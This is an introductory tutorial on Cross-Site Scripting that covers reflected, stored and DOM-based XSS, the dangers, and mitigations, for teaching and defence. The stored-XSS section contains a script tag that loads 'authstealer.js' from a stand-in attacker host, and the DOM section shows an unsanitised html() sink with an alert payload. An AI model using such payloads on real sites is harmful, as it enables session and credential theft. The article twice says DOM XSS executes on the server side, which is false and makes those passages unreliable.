Cross Site Scripting (XSS)

Introduction

 
In this article, we are going to learn about Cross-Site Scripting, also commonly known as (XSS), which has now become a very common web application attack in recent years. Cross-Site Scripting is listed seventh on the OWASP top ten of 2017. We will look at its definition, different types, and finally, we will look at how to mitigate XSS.
 

What is Cross-Site Scripting (XSS)?

 
Cross-Site scripting involves the use of malicious client-side scripts to an unsuspecting different end-user. The attacker takes advantage of unvalidated user input fields to send malicious scripts which may end up compromising the website or web application.
 
Once these malicious scripts are executed, they may be used to access session tokens or sensitive information such as passwords stored by the browser. In some cases, attackers may use these malicious scripts HTML pages to manipulate unsuspecting users.
 

Types of Cross-Site Scripting (XSS)

 
XSS has three main types, namely:
  • Reflected XSS
  • Stored XSS
  • DOM-Based XSS
XSS Animation
 
Cross-Site Scripting (XSS)
 
Reflected XSS
 
Reflected XSS refers to malicious scripts that use the current HTTP request. These may come in the form of enticing links on websites to attract unsuspecting users to open the link. The moment any user clicks the link the attacker gains access to the user’s session token, passwords, or any other sensitive information which the script requires without the user’s knowledge. Reflected XSS only affects those users who have clicked the dangerous link.
 
Stored XSS
 
Unlike with a Reflected attack, the Stored XSS attack resides on the Web page of the compromised website or web application and every time users visit the page the attacker may have access to every information which may be stored in the browser. For example, an attacker may realize that HTML tags may be embedded in the comments section of a web page.
 
<script src=”http://evildoersssite.com/authstealer.js”> </script>.
 
The attacker will store his malicious script within the comments section but every user who visits that particular page will be open to attack even if they do not even post a comment.
 
DOM XSS
 
The XSS attacks described above have something in common: the web page with embedded malicious scripts is formed on the server-side. However, the client frameworks used in modern web applications allow changing a web page without accessing the server. The document object model (DOM) can be modified directly on the client-side.
 
The main premise behind this vulnerability remains the same: specifically, poorly implemented processing of HTML escape sequences. This leads to attacker-controlled JavaScript appearing in the text of a web page and then this code is executed in the context of the server posing harm to unsuspecting users.
 
Example
 
<div id="warning-text">This is a warning alert</div>
 
The HTML code has an element with the identifier “warning-text” , meaning that it is used to display the text of a message. The DOM tree can be used by an attacker with a JavaScript function,
 
function warning(msg) { $("#warning-text").html(msg); $("#msg").prop('style', 'display:inherit'); }
The script displays the message with an html() function, which doesn’t sanitize HTML escape sequences. Such an implementation is vulnerable if a malicious script is passed to the function.
 
<script>alert(“Evildoer”)</script>
 
In this case, the malicious script will be executed on the server-side, compromising the website or web page.
 

Cross-Site Scripting Possible Dangers

  • Identity theft
  • The attacker can access the user’s permissions on the web application or website
  • The attacker has access to the user’s login credentials
  • The attacker may deface the website virtually
  • Use Trojan Horse capabilities on the website

How to mitigate XSS

 
Some of the methods to effectively prevent XSS vulnerabilities include:
  • Strictly filter user input as soon as it received and cross-check the expected input against the input supplied by the user.
  • Encode all output data to safeguard it from being conveyed as active content by using a combination of HTML, URL, JavaScript, and CSS encoding.
  • To avoid executions of unintended scripts in HTTP responses, it is necessary to define the Content-Type and the X-Content Type Options in your headers so that the response can be interpreted correctly.

Conclusion

 
The impact of Cross-Site Scripting is very serious because, in most of its implementations, it targets unsuspecting users who might end up losing money or filing law-suits against organizations, thereby damaging organizational reputation as well as the clients.